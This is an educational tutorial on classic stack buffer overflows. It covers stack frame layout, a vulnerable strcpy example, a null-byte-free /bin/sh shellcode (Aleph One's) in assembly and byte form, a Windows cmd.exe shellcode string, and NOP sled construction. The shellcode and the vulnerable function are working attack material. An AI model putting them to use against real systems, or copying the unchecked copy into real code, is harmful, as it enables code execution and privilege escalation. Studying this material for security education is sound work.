Buffer Overflows
What is a buffer overflow?
A buffer overflow is an input vulnerability, and is currently one of the most common vulnerabilities.
Review
When one function calls another, they follow these steps:
1. Input parameters are pushed onto the stack by the function doing the calling. These are parameters (or variables) that the called function takes as input.
2. The function is called. How does the program know where to go once the function called completes execution? It pushes a return address onto the stack, which will let the program resume execution somewhere in the function doing the calling.
3. The frame pointer is pushed onto the stack by the function which was called. Why is that? Well, when you call a function, a new stack frame is created (for that function), which will contain variables and return addresses for that function. In order to maneuver through these variables, a frame pointer is used.
4. Room on the stack is allocated for local variables of the function being called; space is essentially made for these functions.
5. Any changes or modifications may require registers to get saved so that the function doing the calling can process the results of the function being called.
The resulting stack will look as follows:
| Input Parameters |
| Return Address |
| Frame Pointer |
| Local Variables |
| Saved Registers |
What causes the attack?
The attack is caused because stacks grow from high to low memory addresses, while arrays grow from low to high memory addresses. Thus, a buffer can be overflown with data to the point that a return address is modified. Suppose we had the following function:
void function(char *string) {
char buffer[128];
strcpy(buffer, string);
}
The strcpy() function keeps copying until it hits a null character. Thus, if the string were to be 136 bytes or more, it would fully overwrite the return address. Why 136 bytes? Because our buffer is 128 bytes, and the x86 architecture utilizes 32-bit addresses (for most computers, you may assume they will utilize this architecture). Going back to our stack layout above, the frame pointer takes up 32 bits (or 4 bytes), and the return address also takes up 32 bits (another 4 bytes). Thus, 128 + 4 + 4 = 136. The last 4 bytes overwrite the return address.
How does the attack work?
You overflow the buffer with an attack string consisting of shellcode that causes the return address to become modified. You need to get the return address to point back to your buffer, which contains shellcode that will be executed by the current program once our function call returns (thus, you may get the computer to execute any instruction you wish). When the call to our function returns, it returns to a changed return address which points to our attack buffer. Shellcode within the buffer is then executed.
What is shellcode?
It is code that starts a command shell. A shell is a piece of software that provides an interface for users, allowing access to kernel services. The kernel connects application software to hardware architecture. Writing shellcode requires knowing the architecture's assembly language. You will usually need to write different shellcode for different operating systems or hardware architectures. Consider the following shellcode example.
unsigned char shellcode[] =
"\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
"\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
"\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
"\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
"\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";
This is a 57 byte long shellcode which is advertised to execute cmd.exe under Windows XP SP2. It was written by Mountassif Moad (I have not tested it, nor can I certify it works; what you do with it is not my responsibility). Whatever the shellcode provides to the exploiter is called a payload (in this case the payload is access to cmd.exe).
What kind of payload do you want?
In most cases, the program you want to exploit will run as the root, or some user that has very high security priveleges. You will want to gain a command shell so that you may perform many priveleged tasks (its assumed that you are not running as an administrator, but a user with less priveleges). To gain a command shell in UNIX, you would call exec("/bin/sh"). To obtain a command shell in Windows, the call is exec("cmd.exe"). The following block of C code can be used in UNIX to replace a currently running program with a shell.
#include
void main() {
char *arguments[2];
arguments[0] = "/bin/sh";
arguments[1] = NULL;
execve(arguments[0], arguments, NULL);
}
You can disassemble this code in a debugger and use it as shellcode, but it will usually be too long for practical purposes. In any case disassembling main() above will tell you what system calls are required to run execve(), so that you may produce an optimized shellcode which may do something like the following:
1. It starts by initializing registers. To do this, you will need to compute the exact address of "/bin/sh" (this computation is usually done by jumping to the "/bin/sh" string such as in Aleph One's shellcode below and putting the address of it into a register; notice how the jump is made for the entire length of the shellcode since the string is at the very end).
2. Execute the $0x80 instruction (this is just a trap into the kernel).
3. Run the system call.
Aleph One's shellcode disassembly:
jmp 0x26
popl %esi
movl %esi,0x8(%esi)
movb $0x0,0x7(%esi)
movl $0x0,0xc(%esi)
movl $0xb,%eax
movl %esi,%ebx
leal 0x8(%esi),%ecx
movl 0xc(%esi),%edx
int $0x80
movl $0x1, %eax
movl $0x0, %ebx
int $0x80
call -0x24
.string "/bin/sh"
Once again, the jump is made to the very end (jmp 0x26), and then we make a call back to the top where we pop the address (call -0x24 after jumping to the address). To get this shellcode to work within a buffer, you need it in the form of a binary string. If you compile this code as a binary string, it will result in the following:
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
The problem with this shellcode is that \x00 represents a null terminating character. Why is this bad? Many string functions will stop copying once they hit a null byte, so we must make sure that our shellcode does not contain a null character. Optimizing and removing null bytes gives us the following shellcode:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
This is the final product, and will be what you send into your attack string.
Exploit Formatting
We know that our shellcode is in the attack buffer, but we do not know at what memory address it is located. We have to guess the location of the shellcode (our return address will point somewhere where we think the buffer will be in memory). We can make use of NOP's. NOP's are instructions that do nothing but continue executing the next instruction. When used in an attack buffer, they allow us to be able to guess more addresses, because if we hit a NOP we are guaranteed to eventually execute our attack string. Thus, an attack buffer can be constructed as follows:
If we end up modifying our return address to point anywhere in the NOP region above, our shellcode will eventually get executed. This is called a NOP sled.
Summary
1. The buffer is overflown (within the buffer's contents we place a NOP sled followed by our shellcode).
2. The return address gets modified to point to some location within the buffer; more overflowing.
3. Assuming we hit a correct address within the buffer, when our function call returns it will execute our shellcode (it may start sliding up the NOP sled until it reaches this shellcode).
4. The exploiter may recieve his payload based on whatever shellcode he or she used.
Thank you for reading this article. If you have any suggestions or need clarification please do not hesitate to start a thread on my
forum or to send me an
e-mail. There is no such thing as a stupid question, but there is such a thing as a stupid fear of asking.